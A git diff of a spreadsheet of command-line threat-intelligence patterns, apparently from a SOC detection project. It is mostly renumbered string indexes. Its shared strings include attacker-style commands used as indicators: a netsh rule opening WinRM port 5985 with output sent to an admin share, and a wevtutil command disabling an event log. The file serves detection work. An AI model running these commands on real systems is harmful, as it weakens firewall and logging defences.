-        <v>236</v>
+        <v>235</v>
       </c>
     </row>
     <row r="133" spans="1:6" ht="17">
@@ -3926,14 +3925,14 @@
         <v>91</v>
       </c>
       <c r="B133" s="1" t="s">
-        <v>288</v>
+        <v>287</v>
       </c>
       <c r="C133" s="1"/>
       <c r="E133" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F133" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
     </row>
     <row r="134" spans="1:6" ht="68">
@@ -3941,14 +3940,14 @@
         <v>91</v>
       </c>
       <c r="B134" s="1" t="s">
-        <v>289</v>
+        <v>288</v>
       </c>
       <c r="C134" s="1"/>
       <c r="E134" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F134" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
     </row>
     <row r="135" spans="1:6" ht="51">
@@ -3956,14 +3955,14 @@
         <v>91</v>
       </c>
       <c r="B135" s="1" t="s">
-        <v>336</v>
+        <v>334</v>
       </c>
       <c r="C135" s="1"/>
       <c r="E135" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F135" t="s">
-        <v>330</v>
+        <v>328</v>
       </c>
     </row>
     <row r="136" spans="1:6" ht="68">
@@ -3971,14 +3970,14 @@
         <v>91</v>
       </c>
       <c r="B136" s="1" t="s">
-        <v>341</v>
+        <v>339</v>
       </c>
       <c r="C136" s="1"/>
       <c r="E136" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F136" t="s">
-        <v>340</v>
+        <v>338</v>
       </c>
     </row>
     <row r="137" spans="1:6" ht="51">
@@ -3986,14 +3985,14 @@
         <v>91</v>
       </c>
       <c r="B137" s="1" t="s">
-        <v>343</v>
+        <v>341</v>
       </c>
       <c r="C137" s="1"/>
       <c r="E137" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F137" t="s">
-        <v>340</v>
+        <v>338</v>
       </c>
     </row>
     <row r="138" spans="1:6" ht="17">
@@ -4001,14 +4000,14 @@
         <v>91</v>
       </c>
       <c r="B138" s="1" t="s">
-        <v>365</v>
+        <v>363</v>
       </c>
       <c r="C138" s="1"/>
       <c r="E138" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F138" t="s">
-        <v>348</v>
+        <v>346</v>
       </c>
     </row>
     <row r="139" spans="1:6" ht="17">
@@ -4016,14 +4015,14 @@
         <v>91</v>
       </c>
       <c r="B139" s="1" t="s">
-        <v>366</v>
+        <v>364</v>
       </c>
       <c r="C139" s="1"/>
       <c r="E139" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F139" t="s">
-        <v>348</v>
+        <v>346</v>
       </c>
     </row>
     <row r="140" spans="1:6" ht="17">
@@ -4031,14 +4030,14 @@
         <v>91</v>
       </c>
       <c r="B140" s="1" t="s">
-        <v>367</v>
+        <v>365</v>
       </c>
       <c r="C140" s="1"/>
       <c r="E140" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F140" t="s">
-        <v>348</v>
+        <v>346</v>
       </c>
     </row>
     <row r="141" spans="1:6" ht="17">
@@ -4046,14 +4045,14 @@
         <v>91</v>
       </c>
       <c r="B141" s="1" t="s">
-        <v>371</v>
+        <v>369</v>
       </c>
       <c r="C141" s="1"/>
       <c r="E141" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F141" t="s">
-        <v>348</v>
+        <v>346</v>
       </c>
     </row>
     <row r="142" spans="1:6" ht="34">
@@ -4090,62 +4089,62 @@
     </row>
     <row r="144" spans="1:6" ht="34">
       <c r="A144" t="s">
-        <v>346</v>
+        <v>344</v>
       </c>
       <c r="B144" s="1" t="s">
-        <v>345</v>
+        <v>343</v>
       </c>
       <c r="C144" s="1"/>
       <c r="E144" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F144" t="s">
-        <v>347</v>
+        <v>345</v>
       </c>
     </row>
     <row r="145" spans="1:6" ht="34">
       <c r="A145" t="s">
-        <v>346</v>
+        <v>344</v>
       </c>
       <c r="B145" s="1" t="s">
-        <v>369</v>
+        <v>367</v>
       </c>
       <c r="C145" s="1"/>
       <c r="E145" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F145" t="s">
-        <v>348</v>
+        <v>346</v>
       </c>
     </row>
     <row r="146" spans="1:6" ht="34">
       <c r="A146" t="s">
-        <v>346</v>
+        <v>344</v>
       </c>
       <c r="B146" s="1" t="s">
-        <v>370</v>
+        <v>368</v>
       </c>
       <c r="C146" s="1"/>
       <c r="E146" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F146" t="s">
-        <v>348</v>
+        <v>346</v>
       </c>
     </row>
     <row r="147" spans="1:6" ht="34">
       <c r="A147" t="s">
-        <v>346</v>
+        <v>344</v>
       </c>
       <c r="B147" s="1" t="s">
-        <v>380</v>
+        <v>378</v>
       </c>
       <c r="C147" s="1"/>
       <c r="E147" t="s">
-        <v>379</v>
+        <v>377</v>
       </c>
       <c r="F147" t="s">
-        <v>378</v>
+        <v>376</v>
       </c>
     </row>
     <row r="148" spans="1:6" ht="34">
@@ -4368,14 +4367,14 @@
         <v>21</v>
       </c>
       <c r="B161" s="1" t="s">
-        <v>233</v>
+        <v>232</v>
       </c>
       <c r="C161" s="1"/>
       <c r="E161" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
       <c r="F161" t="s">
-        <v>226</v>
+        <v>225</v>
       </c>
     </row>
     <row r="162" spans="1:6" ht="34">
@@ -4383,14 +4382,14 @@
         <v>21</v>
       </c>
       <c r="B162" s="1" t="s">
-        <v>232</v>
+        <v>231</v>
       </c>
       <c r="C162" s="1"/>
       <c r="E162" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
       <c r="F162" t="s">
-        <v>226</v>
+        <v>225</v>
       </c>
     </row>
     <row r="163" spans="1:6" ht="119">
@@ -4398,14 +4397,14 @@
         <v>21</v>
       </c>
       <c r="B163" s="1" t="s">
-        <v>234</v>
+        <v>233</v>
       </c>
       <c r="C163" s="1"/>
       <c r="E163" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
       <c r="F163" t="s">
-        <v>226</v>
+        <v>225</v>
       </c>
     </row>
     <row r="164" spans="1:6" ht="34">
@@ -4413,14 +4412,14 @@
         <v>21</v>
       </c>
       <c r="B164" s="1" t="s">
-        <v>244</v>
+        <v>243</v>
       </c>
       <c r="C164" s="1"/>
       <c r="E164" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F164" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
     </row>
     <row r="165" spans="1:6" ht="34">
@@ -4428,14 +4427,14 @@
         <v>21</v>
       </c>
       <c r="B165" s="1" t="s">
-        <v>245</v>
+        <v>244</v>
       </c>
       <c r="C165" s="1"/>
       <c r="E165" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F165" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
     </row>
     <row r="166" spans="1:6" ht="34">
@@ -4443,14 +4442,14 @@
         <v>21</v>
       </c>
       <c r="B166" s="1" t="s">
-        <v>246</v>
+        <v>245</v>
       </c>
       <c r="C166" s="1"/>
       <c r="E166" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F166" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
     </row>
     <row r="167" spans="1:6" ht="34">
@@ -4458,16 +4457,16 @@
         <v>21</v>
       </c>
       <c r="B167" s="1" t="s">
-        <v>247</v>
+        <v>246</v>
       </c>
       <c r="C167" s="1" t="s">
-        <v>250</v>
+        <v>249</v>
       </c>
       <c r="E167" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F167" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
     </row>
     <row r="168" spans="1:6" ht="34">
@@ -4475,16 +4474,16 @@
         <v>21</v>
       </c>
       <c r="B168" s="1" t="s">
-        <v>248</v>
+        <v>247</v>
       </c>
       <c r="C168" s="1" t="s">
-        <v>251</v>
+        <v>250</v>
       </c>
       <c r="E168" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F168" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
     </row>
     <row r="169" spans="1:6" ht="17">
@@ -4492,16 +4491,16 @@
         <v>21</v>
       </c>
       <c r="B169" s="1" t="s">
-        <v>249</v>
+        <v>248</v>
       </c>
       <c r="C169" s="1" t="s">
-        <v>252</v>
+        <v>251</v>
       </c>
       <c r="E169" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F169" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
     </row>
     <row r="170" spans="1:6" ht="34">
@@ -4509,16 +4508,16 @@
         <v>21</v>
       </c>
       <c r="B170" s="1" t="s">
-        <v>269</v>
+        <v>268</v>
       </c>
       <c r="C170" s="1" t="s">
-        <v>271</v>
+        <v>270</v>
       </c>
       <c r="E170" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F170" t="s">
-        <v>273</v>
+        <v>272</v>
       </c>
     </row>
     <row r="171" spans="1:6" ht="34">
@@ -4526,16 +4525,16 @@
         <v>21</v>
       </c>
       <c r="B171" s="1" t="s">
-        <v>270</v>
+        <v>269</v>
       </c>
       <c r="C171" s="1" t="s">
+        <v>271</v>
+      </c>
+      <c r="E171" t="s">
+        <v>236</v>
+      </c>
+      <c r="F171" t="s">
         <v>272</v>
-      </c>
-      <c r="E171" t="s">
-        <v>237</v>
-      </c>
-      <c r="F171" t="s">
-        <v>273</v>
       </c>
     </row>
     <row r="172" spans="1:6" ht="34">
@@ -4543,14 +4542,14 @@
         <v>21</v>
       </c>
       <c r="B172" s="1" t="s">
-        <v>270</v>
+        <v>269</v>
       </c>
       <c r="C172" s="1"/>
       <c r="E172" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F172" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
     </row>
     <row r="173" spans="1:6" ht="34">
@@ -4558,14 +4557,14 @@
         <v>21</v>
       </c>
       <c r="B173" s="1" t="s">
-        <v>269</v>
+        <v>268</v>
       </c>
       <c r="C173" s="1"/>
       <c r="E173" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F173" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
     </row>
     <row r="174" spans="1:6" ht="17">
@@ -4573,14 +4572,14 @@
         <v>21</v>
       </c>
       <c r="B174" s="1" t="s">
-        <v>280</v>
+        <v>279</v>
       </c>
       <c r="C174" s="1"/>
       <c r="E174" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F174" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
     </row>
     <row r="175" spans="1:6" ht="34">
@@ -4588,14 +4587,14 @@
         <v>21</v>
       </c>
       <c r="B175" s="1" t="s">
-        <v>248</v>
+        <v>247</v>
       </c>
       <c r="C175" s="1"/>
       <c r="E175" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F175" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
     </row>
     <row r="176" spans="1:6" ht="34">
@@ -4603,14 +4602,14 @@
         <v>21</v>
       </c>
       <c r="B176" s="1" t="s">
-        <v>247</v>
+        <v>246</v>
       </c>
       <c r="C176" s="1"/>
       <c r="E176" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F176" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
     </row>
     <row r="177" spans="1:6" ht="17">
@@ -4618,14 +4617,14 @@
         <v>21</v>
       </c>
       <c r="B177" s="1" t="s">
-        <v>249</v>
+        <v>248</v>
       </c>
       <c r="C177" s="1"/>
       <c r="E177" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F177" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
     </row>
     <row r="178" spans="1:6" ht="34">
@@ -4633,14 +4632,14 @@
         <v>21</v>
       </c>
       <c r="B178" s="1" t="s">
-        <v>294</v>
+        <v>293</v>
       </c>
       <c r="C178" s="1"/>
       <c r="E178" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F178" t="s">
-        <v>292</v>
+        <v>291</v>
       </c>
     </row>
     <row r="179" spans="1:6" ht="34">
@@ -4648,14 +4647,14 @@
         <v>21</v>
       </c>
       <c r="B179" s="1" t="s">
-        <v>297</v>
+        <v>296</v>
       </c>
       <c r="C179" s="1"/>
       <c r="E179" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F179" t="s">
-        <v>292</v>
+        <v>291</v>
       </c>
     </row>
     <row r="180" spans="1:6" ht="34">
@@ -4663,14 +4662,14 @@
         <v>21</v>
       </c>
       <c r="B180" s="1" t="s">
-        <v>298</v>
+        <v>297</v>
       </c>
       <c r="C180" s="1"/>
       <c r="E180" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F180" t="s">
-        <v>292</v>
+        <v>291</v>
       </c>
     </row>
     <row r="181" spans="1:6" ht="34">
@@ -4678,14 +4677,14 @@
         <v>21</v>
       </c>
       <c r="B181" s="1" t="s">
-        <v>321</v>
+        <v>319</v>
       </c>
       <c r="C181" s="1"/>
       <c r="E181" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F181" t="s">
-        <v>323</v>
+        <v>321</v>
       </c>
     </row>
     <row r="182" spans="1:6" ht="34">
@@ -4693,14 +4692,14 @@
         <v>21</v>
       </c>
       <c r="B182" s="1" t="s">
-        <v>350</v>
+        <v>348</v>
       </c>
       <c r="C182" s="1"/>
       <c r="E182" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F182" t="s">
-        <v>348</v>
+        <v>346</v>
       </c>
     </row>
     <row r="183" spans="1:6" ht="51">
@@ -4708,14 +4707,14 @@
         <v>21</v>
       </c>
       <c r="B183" s="1" t="s">
-        <v>351</v>
+        <v>349</v>
       </c>
       <c r="C183" s="1"/>
       <c r="E183" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F183" t="s">
-        <v>348</v>
+        <v>346</v>
       </c>
     </row>
     <row r="184" spans="1:6" ht="34">
@@ -4723,51 +4722,51 @@
         <v>21</v>
       </c>
       <c r="B184" s="1" t="s">
-        <v>352</v>
+        <v>350</v>
       </c>
       <c r="C184" s="1"/>
       <c r="E184" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F184" t="s">
-        <v>348</v>
+        <v>346</v>
       </c>
     </row>
     <row r="185" spans="1:6" ht="17">
       <c r="A185" t="s">
-        <v>333</v>
+        <v>331</v>
       </c>
       <c r="B185" s="1" t="s">
-        <v>331</v>
+        <v>329</v>
       </c>
       <c r="C185" s="1"/>
       <c r="E185" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F185" t="s">
-        <v>330</v>
+        <v>328</v>
       </c>
     </row>
     <row r="186" spans="1:6" ht="17">
       <c r="A186" t="s">
-        <v>333</v>
+        <v>331</v>
       </c>
       <c r="B186" s="1" t="s">
-        <v>375</v>
+        <v>373</v>
       </c>
       <c r="C186" s="1" t="s">
+        <v>374</v>
+      </c>
+      <c r="E186" t="s">
+        <v>377</v>
+      </c>
+      <c r="F186" t="s">
         <v>376</v>
-      </c>
-      <c r="E186" t="s">
-        <v>379</v>
-      </c>
-      <c r="F186" t="s">
-        <v>378</v>
       </c>
     </row>
     <row r="187" spans="1:6" ht="17">
       <c r="A187" t="s">
-        <v>218</v>
+        <v>217</v>
       </c>
       <c r="B187" s="1" t="s">
         <v>87</v>
@@ -4782,7 +4781,7 @@
     </row>
     <row r="188" spans="1:6" ht="17">
       <c r="A188" t="s">
-        <v>218</v>
+        <v>217</v>
       </c>
       <c r="B188" s="1" t="s">
         <v>87</v>
@@ -4797,7 +4796,7 @@
     </row>
     <row r="189" spans="1:6" ht="34">
       <c r="A189" t="s">
-        <v>218</v>
+        <v>217</v>
       </c>
       <c r="B189" s="1" t="s">
         <v>212</v>
@@ -4814,54 +4813,54 @@
     </row>
     <row r="190" spans="1:6" ht="136">
       <c r="A190" t="s">
-        <v>218</v>
+        <v>217</v>
       </c>
       <c r="B190" s="1" t="s">
-        <v>217</v>
+        <v>216</v>
       </c>
       <c r="C190" s="1"/>
       <c r="E190" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
       <c r="F190" t="s">
-        <v>226</v>
+        <v>225</v>
       </c>
     </row>
     <row r="191" spans="1:6" ht="17">
       <c r="A191" t="s">
-        <v>218</v>
+        <v>217</v>
       </c>
       <c r="B191" s="1" t="s">
+        <v>254</v>
+      </c>
+      <c r="C191" s="1" t="s">
         <v>255</v>
       </c>
-      <c r="C191" s="1" t="s">
-        <v>256</v>
-      </c>
       <c r="E191" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F191" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
     </row>
     <row r="192" spans="1:6" ht="119">
       <c r="A192" t="s">
-        <v>218</v>
+        <v>217</v>
       </c>
       <c r="B192" s="1" t="s">
-        <v>322</v>
+        <v>320</v>
       </c>
       <c r="C192" s="1"/>
       <c r="E192" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F192" t="s">
-        <v>323</v>
+        <v>321</v>
       </c>
     </row>
     <row r="193" spans="1:6" ht="17">
       <c r="A193" t="s">
-        <v>214</v>
+        <v>411</v>
       </c>
       <c r="B193" s="1" t="s">
         <v>204</v>
@@ -4929,77 +4928,77 @@
     </row>
     <row r="197" spans="1:6" ht="17">
       <c r="A197" t="s">
-        <v>307</v>
+        <v>306</v>
       </c>
       <c r="B197" s="1" t="s">
         <v>58</v>
       </c>
       <c r="C197" s="1"/>
       <c r="E197" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F197" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
     </row>
     <row r="198" spans="1:6" ht="17">
       <c r="A198" t="s">
-        <v>284</v>
+        <v>283</v>
       </c>
       <c r="B198" s="1" t="s">
-        <v>222</v>
+        <v>221</v>
       </c>
       <c r="C198" s="1"/>
       <c r="E198" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
       <c r="F198" t="s">
-        <v>226</v>
+        <v>225</v>
       </c>
     </row>
     <row r="199" spans="1:6" ht="323">
       <c r="A199" t="s">
-        <v>284</v>
+        <v>283</v>
       </c>
       <c r="B199" s="1" t="s">
-        <v>328</v>
+        <v>326</v>
       </c>
       <c r="C199" s="1"/>
       <c r="E199" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F199" t="s">
-        <v>323</v>
+        <v>321</v>
       </c>
     </row>
     <row r="200" spans="1:6" ht="68">
       <c r="A200" t="s">
-        <v>283</v>
+        <v>282</v>
       </c>
       <c r="B200" s="1" t="s">
-        <v>281</v>
+        <v>280</v>
       </c>
       <c r="C200" s="1"/>
       <c r="E200" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F200" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
     </row>
     <row r="201" spans="1:6" ht="68">
       <c r="A201" t="s">
-        <v>283</v>
+        <v>282</v>
       </c>
       <c r="B201" s="1" t="s">
-        <v>282</v>
+        <v>281</v>
       </c>
       <c r="C201" s="1"/>
       <c r="E201" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F201" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
     </row>
     <row r="202" spans="1:6" ht="51">
@@ -5135,14 +5134,14 @@
         <v>24</v>
       </c>
       <c r="B210" s="1" t="s">
-        <v>242</v>
+        <v>241</v>
       </c>
       <c r="C210" s="1"/>
       <c r="E210" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F210" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
     </row>
     <row r="211" spans="1:6" ht="17">
@@ -5150,14 +5149,14 @@
         <v>24</v>
       </c>
       <c r="B211" s="1" t="s">
-        <v>243</v>
+        <v>242</v>
       </c>
       <c r="C211" s="1"/>
       <c r="E211" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F211" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
     </row>
     <row r="212" spans="1:6" ht="34">
@@ -5165,16 +5164,16 @@
         <v>24</v>
       </c>
       <c r="B212" s="1" t="s">
+        <v>264</v>
+      </c>
+      <c r="C212" s="1" t="s">
         <v>265</v>
       </c>
-      <c r="C212" s="1" t="s">
-        <v>266</v>
-      </c>
       <c r="E212" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F212" t="s">
-        <v>236</v>
+        <v>235</v>
       </c>
     </row>
     <row r="213" spans="1:6" ht="17">
@@ -5182,14 +5181,14 @@
         <v>24</v>
       </c>
       <c r="B213" s="1" t="s">
-        <v>285</v>
+        <v>284</v>
       </c>
       <c r="C213" s="1"/>
       <c r="E213" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F213" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
     </row>
     <row r="214" spans="1:6" ht="17">
@@ -5197,14 +5196,14 @@
         <v>24</v>
       </c>
       <c r="B214" s="1" t="s">
-        <v>286</v>
+        <v>285</v>
       </c>
       <c r="C214" s="1"/>
       <c r="E214" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F214" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
     </row>
     <row r="215" spans="1:6" ht="204">
@@ -5212,14 +5211,14 @@
         <v>24</v>
       </c>
       <c r="B215" s="1" t="s">
-        <v>293</v>
+        <v>292</v>
       </c>
       <c r="C215" s="1"/>
       <c r="E215" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F215" t="s">
-        <v>292</v>
+        <v>291</v>
       </c>
     </row>
     <row r="216" spans="1:6" ht="17">
@@ -5227,14 +5226,14 @@
         <v>24</v>
       </c>
       <c r="B216" s="1" t="s">
-        <v>387</v>
+        <v>385</v>
       </c>
       <c r="C216" s="1"/>
       <c r="E216" t="s">
-        <v>383</v>
+        <v>381</v>
       </c>
       <c r="F216" t="s">
-        <v>384</v>
+        <v>382</v>
       </c>
     </row>
     <row r="217" spans="1:6" ht="17">
@@ -5508,14 +5507,14 @@
         <v>11</v>
       </c>
       <c r="B233" s="1" t="s">
-        <v>308</v>
+        <v>307</v>
       </c>
       <c r="C233" s="1"/>
       <c r="E233" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F233" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
     </row>
     <row r="234" spans="1:6" ht="34">
@@ -5523,14 +5522,14 @@
         <v>11</v>
       </c>
       <c r="B234" s="1" t="s">
-        <v>338</v>
+        <v>336</v>
       </c>
       <c r="C234" s="1"/>
       <c r="E234" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F234" t="s">
-        <v>330</v>
+        <v>328</v>
       </c>
     </row>
     <row r="235" spans="1:6" ht="17">
@@ -5538,14 +5537,14 @@
         <v>11</v>
       </c>
       <c r="B235" s="1" t="s">
-        <v>339</v>
+        <v>337</v>
       </c>
       <c r="C235" s="1"/>
       <c r="E235" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F235" t="s">
-        <v>340</v>
+        <v>338</v>
       </c>
     </row>
     <row r="236" spans="1:6" ht="17">
@@ -5553,14 +5552,14 @@
         <v>11</v>
       </c>
       <c r="B236" s="1" t="s">
-        <v>342</v>
+        <v>340</v>
       </c>
       <c r="C236" s="1"/>
       <c r="E236" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F236" t="s">
-        <v>340</v>
+        <v>338</v>
       </c>
     </row>
     <row r="237" spans="1:6" ht="17">
@@ -5568,14 +5567,14 @@
         <v>11</v>
       </c>
       <c r="B237" s="1" t="s">
-        <v>344</v>
+        <v>342</v>
       </c>
       <c r="C237" s="1"/>
       <c r="E237" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F237" t="s">
-        <v>340</v>
+        <v>338</v>
       </c>
     </row>
     <row r="238" spans="1:6" ht="34">
@@ -5583,14 +5582,14 @@
         <v>11</v>
       </c>
       <c r="B238" s="1" t="s">
-        <v>354</v>
+        <v>352</v>
       </c>
       <c r="C238" s="1"/>
       <c r="E238" t="s">
-        <v>310</v>
+        <v>309</v>
       </c>
       <c r="F238" t="s">
-        <v>348</v>
+        <v>346</v>
       </c>
     </row>
     <row r="239" spans="1:6" ht="17">
@@ -5598,31 +5597,31 @@
         <v>11</v>
       </c>
       <c r="B239" s="1" t="s">
-        <v>386</v>
+        <v>384</v>
       </c>
       <c r="C239" s="1"/>
       <c r="E239" t="s">
-        <v>383</v>
+        <v>381</v>
       </c>
       <c r="F239" t="s">
-        <v>384</v>
+        <v>382</v>
       </c>
     </row>
     <row r="240" spans="1:6" ht="51">
       <c r="A240" t="s">
+        <v>277</v>
+      </c>
+      <c r="B240" s="1" t="s">
+        <v>276</v>
+      </c>
+      <c r="C240" s="1" t="s">
         <v>278</v>
       </c>
-      <c r="B240" s="1" t="s">
-        <v>277</v>
-      </c>
-      <c r="C240" s="1" t="s">
-        <v>279</v>
-      </c>
       <c r="E240" t="s">
-        <v>237</v>
+        <v>236</v>
       </c>
       <c r="F240" t="s">
-        <v>275</v>
+        <v>274</v>
       </c>
     </row>
   </sheetData>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{0AA8F98D-FC4F-0F47-B15F-252293DC8C43}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{3982BF6A-0F46-4144-A85B-4E7C1D956AF4}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
@@ -1804,8 +1804,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F240"/>
   <sheetViews>
-    <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="B118" sqref="A118:F118"/>
+    <sheetView tabSelected="1" topLeftCell="A130" workbookViewId="0">
+      <selection activeCell="B190" sqref="B190"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{3982BF6A-0F46-4144-A85B-4E7C1D956AF4}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{FC3F9FBD-DE53-BA47-B6D0-CAD44824324A}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
+    <workbookView xWindow="80" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
   <sheets>
     <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1063" uniqueCount="412">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1063" uniqueCount="417">
   <si>
     <t>Pattern</t>
   </si>
@@ -389,9 +389,6 @@
   </si>
   <si>
     <t>cmd.exe /q /c netsh advfirewall firewall add rule name=service dir=in protocol=tcp localport=5985 action=permit 1&gt; \\127.0.0.1\c$\windows\temp\qaiumg 2&gt;&amp;1</t>
-  </si>
-  <si>
-    <t>NETSH</t>
   </si>
   <si>
     <t>c:\windows\system32\wevtutil.exe set-log active directory web services /enabled:false</t>
@@ -1380,6 +1377,26 @@
   </si>
   <si>
     <t>SHARPPSHARE</t>
+  </si>
+  <si>
+    <t>NETSH_P1000</t>
+  </si>
+  <si>
+    <t>NETSH_P2000</t>
+  </si>
+  <si>
+    <t>NETSH_P1001</t>
+  </si>
+  <si>
